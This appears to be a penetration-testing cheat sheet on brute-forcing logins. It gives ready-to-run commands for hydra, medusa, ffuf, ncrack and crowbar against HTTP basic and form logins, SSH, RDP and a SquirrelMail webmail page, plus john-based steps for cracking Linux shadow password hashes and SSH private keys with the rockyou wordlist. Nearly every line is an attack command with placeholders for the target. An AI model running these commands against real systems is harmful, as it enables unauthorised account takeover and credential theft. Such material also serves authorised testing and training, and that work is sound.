Skip to content

Bruteforce

Basic Auth

hydra

hydra -L <USER_FILE> -P <PASS_FILE> -s 80 -f <IP> http-get / 
medusa
medusa -h <IP> -u <USER> -P <PASS_FILE> -M  http -m DIR:/webdav/ -T 10

Form Auth

hydra

hydra <IP> http-post-form "/login.php:username=^USER^&password=^PASS^:invalid" -l <USER> -P <PASS_FILE> -vV -f
ffuf
ffuf -w <PASS_FILE> -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -x http://127.0.0.1:8080 -fs 206

SSH

hydra

hydra -l <USER> -P <PASS_FILE> ssh://<IP>

RDP

ncrack

ncrack -vv --user <USER> -P <PASS_FILE> rdp://<IP>
hydra
hydra -V -f -L <USER_LIST> -P <PASS_FILE> rdp://<IP>
crowbar
crowbar -b rdp -s <IP> -u <USER> -C <PASS_FILE> -n 1

Passwd shadow

step 1

unshadow passwd.txt shadow.txt > pass_shad.txt
step 2
john pass_shad.txt
john pass_shad.txt --wordlist=/usr/share/wordlists/rockyou.txt

Crack id_rsa

ssh2john id_rsa > id_rsa-hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa-hash

SquirrelMail 1.2.10

hydra

hydra -l <USER> -P <PASS_FILE> <IP> http-post-form "/webmail/src/redirect.php:username=^USER^&password=^PASS^:F=incorrect" -V -F -u